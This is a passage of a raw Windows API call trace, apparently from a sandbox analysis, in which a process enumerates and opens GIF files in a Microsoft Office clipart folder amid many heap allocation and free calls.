SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.665] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.665] CloseHandle (hObject=0x33c) returned 1 [0100.665] AreFileApisANSI () returned 1 [0100.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a790 [0100.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a790, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 69 [0100.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0100.665] GetFileType (hFile=0x33c) returned 0x1 [0100.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0100.666] CloseHandle (hObject=0x33c) returned 1 [0100.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0100.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0100.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0100.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0100.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0100.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0100.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.667] AreFileApisANSI () returned 1 [0100.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0100.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 69 [0100.667] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1485)) returned 1 [0100.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0100.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0100.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.667] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa24, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00135_.GIF", cAlternateFileName="")) returned 1 [0100.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0100.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0100.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0100.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0100.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0100.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0100.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0100.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0100.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0100.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0100.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.668] AreFileApisANSI () returned 1 [0100.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0100.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0100.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.668] AreFileApisANSI () returned 1 [0100.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ae18 [0100.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 69 [0100.669] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0100.670] GetFileType (hFile=0x33c) returned 0x1 [0100.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0100.670] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.670] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.671] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.671] CloseHandle (hObject=0x33c) returned 1 [0100.671] AreFileApisANSI () returned 1 [0100.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8af48 [0100.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 69 [0100.671] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0100.671] GetFileType (hFile=0x33c) returned 0x1 [0100.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0100.671] CloseHandle (hObject=0x33c) returned 1 [0100.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0100.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0100.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0100.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0100.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0100.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0100.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.673] AreFileApisANSI () returned 1 [0100.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0100.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 69 [0100.673] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa24)) returned 1 [0100.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0100.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0100.673] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.673] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.673] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x296f, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00139_.GIF", cAlternateFileName="")) returned 1 [0100.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0100.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0100.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0100.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0100.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0100.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b110 [0100.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0100.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0100.674] HeapFree (in: 